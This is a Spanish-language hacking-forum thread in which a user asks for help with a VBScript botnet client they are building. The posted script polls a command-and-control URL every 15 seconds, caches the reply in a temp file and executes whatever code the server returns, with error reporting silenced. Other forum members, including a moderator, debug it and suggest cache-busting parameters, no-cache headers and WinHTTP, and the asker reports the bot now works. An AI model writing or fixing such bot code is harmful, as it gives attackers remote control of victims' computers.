elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Error de XmlHTTP
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Error de XmlHTTP  (Leído 4,028 veces)
Monkeykiller_vb

Desconectado Desconectado

Mensajes: 25



Ver Perfil
Error de XmlHTTP
« en: 11 Octubre 2019, 23:05 pm »

Hola! Tengo un problema con uno de mis proyectos, quiero hacer una botnet vbs pero no funciona como esperaba:
Código:
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("Microsoft.XmlHttp")

Do
Set file = fso.OpenTextFile(fso.getSpecialFolder(2) & "\k.tmp", 1, True)
filex = file.readAll
file.Close
http.open "GET", "http://*****.tk/btnet/cmdint.php", False
http.send
If Not(http.responsetext = filex) Then
Set file = fso.OpenTextFile(fso.getSpecialFolder(2) & "\k.tmp", 2, True)
file.Write http.responsetext
file.Close
Execute http.responsetext
End If
Wscript.Sleep 15000
Loop

Cuando se inicia por primera vez, la botnet busca en mi servidor C&C el codigo a ejecutar.
Luego, ejecuta el codigo y lo guarda en un archivo llamado k.tmp
Cuando se repite deberia volver a buscar el codigo en el servidor, y gracias al archivo k.tmp, verificar si el codigo ya se ejecutó antes.

El problema es que cuando ocurre el loop y el archivo de instrucciones del servidor se actualizó, la botnet no recibe el nuevo codigo, sino el anterior  :-\

¿Como puedo solucionarlo?


En línea

Atte.
MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.471


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: Error de XmlHTTP
« Respuesta #1 en: 12 Octubre 2019, 00:11 am »

Hola!

Creo que es porque deberias usar responseText, no responsetext. Creo que es case sensitive.

Saludos!


En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

Monkeykiller_vb

Desconectado Desconectado

Mensajes: 25



Ver Perfil
Re: Error de XmlHTTP
« Respuesta #2 en: 12 Octubre 2019, 05:08 am »

Amigo, no creo que sea eso. Mira esto: http://ito.mx/LGun

Directamente el responseText no se actualiza   :-\
« Última modificación: 12 Octubre 2019, 16:15 pm por Monkeykiller_vb » En línea

Atte.
MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.471


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: Error de XmlHTTP
« Respuesta #3 en: 16 Octubre 2019, 02:04 am »

Prueba a quitar el On Error... a ver si te tira algun error...

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

ThunderCls


Desconectado Desconectado

Mensajes: 455


Coder | Reverser | Gamer


Ver Perfil WWW
Re: Error de XmlHTTP
« Respuesta #4 en: 17 Octubre 2019, 03:05 am »

Tu codigo funciona sin problemas, lo mas probable es que estes teniendo problemas de cache, de ahi que tu peticion no reciba datos actualizados del server. Aqui puedes intentar varias cosas

1- Intenta añadir un parametro aleatorio a tu url, no tiene que ser un parametro utilizable necesariamente, quizas algo como

Código
  1. Randomize
  2. url = "http://*****.tk/btnet/cmdint.php&dummy=" & Rnd

solo para forzar una nueva version de la web

2- Intenta especificando los headers de tu peticion

Código
  1. rl = "http://*****.tk/btnet/cmdint.php"
  2. http.open "GET", url, False
  3. http.setRequestHeader "pragma", "no-cache"
  4. http.setRequestHeader "Cache-Control", "no-cache, no-store"
  5. http.send

3- No estoy seguro si XmlHttp usa los settings de ie, por si acaso desactiva la cache de paginas de ie

4- Usa WinHTTP en lugar de XmlHTTP ya que segun microsoft WinHTTP no implementa cache o cookies
https://docs.microsoft.com/en-us/windows/win32/winhttp/about-winhttp?redirectedfrom=MSDN

Suerte
« Última modificación: 17 Octubre 2019, 03:18 am por ThunderCls » En línea

-[ "…I can only show you the door. You're the one that has to walk through it." – Morpheus (The Matrix) ]-
http://reversec0de.wordpress.com
https://github.com/ThunderCls/
Monkeykiller_vb

Desconectado Desconectado

Mensajes: 25



Ver Perfil
Re: Error de XmlHTTP
« Respuesta #5 en: 5 Noviembre 2019, 14:40 pm »

Tu codigo funciona sin problemas, lo mas probable es que estes teniendo problemas de cache, de ahi que tu peticion no reciba datos actualizados del server. Aqui puedes intentar varias cosas

1- Intenta añadir un parametro aleatorio a tu url, no tiene que ser un parametro utilizable necesariamente, quizas algo como

Código
  1. Randomize
  2. url = "http://*****.tk/btnet/cmdint.php&dummy=" & Rnd

solo para forzar una nueva version de la web

2- Intenta especificando los headers de tu peticion

Código
  1. rl = "http://*****.tk/btnet/cmdint.php"
  2. http.open "GET", url, False
  3. http.setRequestHeader "pragma", "no-cache"
  4. http.setRequestHeader "Cache-Control", "no-cache, no-store"
  5. http.send

3- No estoy seguro si XmlHttp usa los settings de ie, por si acaso desactiva la cache de paginas de ie

4- Usa WinHTTP en lugar de XmlHTTP ya que segun microsoft WinHTTP no implementa cache o cookies
https://docs.microsoft.com/en-us/windows/win32/winhttp/about-winhttp?redirectedfrom=MSDN

Suerte

Gracias, me funcionó cambiarlo a WinHTTP,  ;)
En línea

Atte.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines